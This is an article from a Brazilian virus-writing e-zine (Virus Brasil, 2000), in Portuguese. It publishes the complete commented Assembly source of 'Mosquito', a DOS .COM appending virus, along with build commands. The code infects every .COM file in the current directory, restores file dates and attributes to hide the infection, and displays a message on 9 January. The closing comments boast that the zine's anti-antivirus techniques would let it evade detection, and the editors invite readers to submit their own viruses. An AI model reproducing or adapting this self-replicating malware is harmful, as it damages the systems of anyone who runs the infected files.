Virus Brasil6:(VIRBR06.666):01/04/2000 << Back To Virus Brasil6


─────────────────────────────────────────────────────────────────────────── / __ ___ | / | |__) | | (__ |/ | | \ |___| ___) ─────────────────────────────────────────────────────────────────────────── ─────────────────────────── 66666 - Mosquito virus ─────────────────────────── E' isso ai a galera brazuca marcando presenca, ta ai um virus dum camarada nosso, seu e-mail e' : velloso@inf.furb.rct-sc.br qualquer duvida,ou sugestao, mande um mail pro cara ou aqui pra gente, beleza!?! O virus e'um COM infector de appending em Assembly sem grandes rotinas ou algo desse tipo e' com certeza um virus que a maioria de nos ja'se deparou na frente, afinal creio que infectar um arquivo COM foi a primeira tarefa de todos nos ! Se voce acabou de fazer seu virus, e ta doido pra mandar ele pra gente, nao se acanhe, com certeza ele estara aqui em alguma edicao fu- tura do zine. E nos continuamos a pedir pra voce que tem ai algum material sobre virus que seja nacional (de preferencia) nao perca tempo, mande ja pra gente ... T + ──────────────────────────────────────────────────────────────────────────── __ __ / __ . __ __ __ __ ___ __ | | | | \ | | _ | | |_ | | |\| | |_ |__ |__| |__/ | |__| |__| | |__| | | | |__ ──────────────────────────────────────────────────────────────────────────── ;*************************************************************************** ; ; MOSQUITO.COM v1.0b ; ------------------- ; ; * Virus nao residente ; * Virus de append (tamanho do arquivo eh alterado, mas nao danifica arquivo) ; * Infecta .COM, todos no diretorio atual ; * Nao encriptado ; * Nao infecta .COM com assinatura de .EXE ; * Nao infecta .COM > (65280-VirusSize-2),para evitar mensagem de erro ; ao executar ; * Nao muda atributos do arquivo ; * Nao muda data e hora do arquivo infectado ; ; FALTA!: ; ; * Infectar .EXE, BOOT, Residente, encriptar, Protecao contra gravacao ... ; ; para compilar: ; tasm mosquito ; tlink mosquito /t ; ;***********************CONSTANTES************************ VirusSize equ (fim-inicio) .286 code segment assume cs:code,ds:code,es:code,ss:code org 100h ;***********************CODIGO**************************** ; inicio: ; call virus ; ; virus: ; nop ; serve para nao infectar a si mesmo pop bp ; ajusta offset sub bp,offset virus ; ; mov ax,word ptr [Original+bp] ; restaura bytes originais mov cs:[100h],ax ; mov ax,word ptr [Original+bp+2] ; mov cs:[102h],ax ; ; mov ah,1ah ; ajusta DTA lea dx,[bp+DTA] ; int 21h ; ; mov ah,4eh ; procura primeiro arquivo mov cx,20h ; lea dx,[bp+arqs] ; ; AchaArqs: ; ; int 21h ; jc termina1 ; termina se nao encontrou mais nenhum ; arquivo ; mov ax,4300h ; salva e retira atributos int 21h ; ; mov [bp+atribs],cx ; xor cx,cx ; mov ax,4301h ; int 21h ; ; mov ax,3d02h ; abre arquivo r/w lea dx,[bp+DTA+30] ; int 21h ; ; mov bx,ax ; ; mov ax,5700h ; int 21h ; ; mov [bp+horaarq],cx ; salva data e hora do arquivo mov [bp+dataarq],dx ; ; mov ah,3fh ; salva 4 primeiros bytes originais mov cx,4 ; lea dx,[bp+Original] ; int 21h ; ; jmp continua ; esta parte do codigo eh necessaria ; VirusString db 'Virus Mosquito v1.0b - VirusBrasil 2000.',0ah,0dh,07h,'$' ; termina1: ; porque o jump relativo direto para jmp termina ; termina eh muito longo ; continua: ; ; cmp [Original+bp+3],90h ; Testa pra ver se ja estava infectado je NaoInfectar ; ; cmp word ptr [Original+bp],'ZM' ; Testa pra ver se naun eh um .EXE renomeado je NaoInfectar ; ; cmp word ptr [Original+bp],'MZ' ; Testa pra ver se naun eh um .EXE renomeado je NaoInfectar ; ; ; mov ax,4202h ; fim do arquivo call MovePonteiro ; cmp ax,65278-VirusSize ; testa tamanho limite ja NaoInfectar ; ; sub ax,3 ; calcula distancia do salto mov [bp+Distancia],ax ; ; mov ah,40h ; escreve codigo do virus no final do arquivo mov cx,VirusSize ; lea dx,[bp+inicio] ; int 21h ; ; mov ax,4200h ; inicio do arquivo call MovePonteiro ; ; mov ah,40h ; escreve inst. JMP [xxxx] e NOP no inicio mov cx,4 ; lea dx,[bp+jump] ; int 21h ; ; NaoInfectar: ; mov ax,5701h ; mov cx,[bp+horaarq] ; restaura data e hora do arquivo mov dx,[bp+dataarq] ; int 21h ; ; mov ah,3eh ; fecha arquivo int 21h ; ; mov ax,4301h ; restaura atributos mov cx,[bp+atribs] ; int 21h ; ; mov ah,4fh ; procura o proximo arquivo jmp AchaArqs ; ; termina: ; ; mov ah,2Ah ; funcao de data do MS-DOS int 21h ; ; cmp dh,1 ; jne NaoManifestar ; testa se data = 9 de janeiro cmp dl,9 ; se for entao virus se manifesta jne NaoManifestar ; ; call Manifesto ; ; NaoManifestar: ; cmp word ptr [arqs],2e2ah ; testa se eh primeira execucao je fim ; ; mov ax,100h ; salta para executar programa host jmp ax ; ; ;************************PROCEDIMENTOS********************* MovePonteiro: ; rotina para mover o ponteiro do arquivo xor cx,cx ; xor dx,dx ; int 21h ; ret ; ; Manifesto: ; rotina de manifesto do virus mov ah,9 ; pode ser qualquer coisa rotina lea dx,VirusString+bp ; int 21h ; ret ; ;*************************DADOS E VARIAVEIS**************** original db 0E8h,00,00,90h ; bytes originais jump db 0e9h ; inst. JMP distancia dw ? ; [xxxx] marca db 90h ; marca de infeccao = NOP atribs dw ? ; atributos do arquivo arqs db '*.CoM',0 ; arquivos para infectar horaarq dw ? ; hora do arquivo dataarq dw ? ; data do arquivo ; DTA db 43 dup (0) ; (D)ata (T)ransfer (A)rea ; estrutura do DTA = 'RRRRRRRRRRRRRRRRRRRRRADDHHTTTTNNNNNNNN.EEE',0 ; R=reservado,A=atributos,D=data,H=hora,T=tamanho,N=nome,E=extensao ; fim: ; mov ax,4C00h ; Termina Execucao se for a primeira int 21h ; esta parte nao eh copiada p/ o host ; ends code ; end inicio ; ;*************************************************************************** ─────────────────────────────────────── Comentários ─────────────────────────────────────── Tamanho : 354 Bytes. Data de Ativacao : 09/01/???? Acao : Multiplicaç╞o Infecta : Arquivos .COM (Quantos existirem no diretorio). O vírus é detectado como Type Com na maioria dos Av's, mas como disse o Kama, quem se importa, qualquer coisa, utilize alguma de nossas tecnicas anti Av's e duvido que algum Av pegue o virus acima. T + ──────────────────────────────────────────────────────────────────────────── Copyright ╕ 2000, Vírus Brasil ⌐ ────────────────────────────────────────────────────────────────────────────